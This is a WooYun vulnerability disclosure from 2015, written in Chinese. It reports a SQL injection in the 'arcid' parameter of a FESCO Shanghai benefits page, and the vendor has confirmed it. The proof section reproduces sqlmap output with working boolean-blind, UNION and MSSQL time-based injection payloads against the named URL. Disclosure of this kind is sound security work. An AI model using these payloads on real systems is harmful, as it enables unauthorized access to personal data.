当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095985

漏洞标题:看了刚公开的fesco泄露信息的,也跟风验证一个sql注入

相关厂商:北京外企人力资源服务有限公司

漏洞作者: 汪小弟

提交时间:2015-02-06 18:52

修复时间:2015-03-23 18:54

公开时间:2015-03-23 18:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-10: 厂商已经确认,细节仅向厂商公开
2015-02-20: 细节向核心白帽子及相关领域专家公开
2015-03-02: 细节向普通白帽子公开
2015-03-12: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

sql注入

详细说明:

http://vip.fescoshanghai.com/benefit/sysarticle.aspx?arcid=132


WooYun: 某外企人力资源服务公司服务器沦陷20W用户信息泄露 里的漏洞修复不完整,指哪儿修哪儿吗?

漏洞证明:

GET parameter 'arcid' is vulnerable. Do you want to keep testing the others
f any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s)
quests:
---
Parameter: arcid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: arcid=132' AND 3256=3256 AND 'yNCy'='yNCy
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: arcid=-2377' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NU
NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(106)+CHAR(112)+C
(99)+CHAR(72)+CHAR(104)+CHAR(71)+CHAR(104)+CHAR(105)+CHAR(110)+CHAR(67)+CHA
13)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: arcid=-1065' OR 2990=(SELECT COUNT(*) FROM sysusers AS sys1,sy
ers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS
6,sysusers AS sys7) AND 'ZOEP'='ZOEP
---
[03:35:43] [INFO] testing ***
[03:35:48] [INFO] confirming ***
[03:35:57] [INFO] the back-end DBMS is ***
web server operating system: Windows***
web application technology: ASP.NET, ***
back-end DBMS: ***

修复方案:

你懂的

版权声明:转载请注明来源 汪小弟@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-02-10 16:27

厂商回复:

下属网站有很多,工程师也在积极检查和修补,谢谢这位同学。

最新状态:

暂无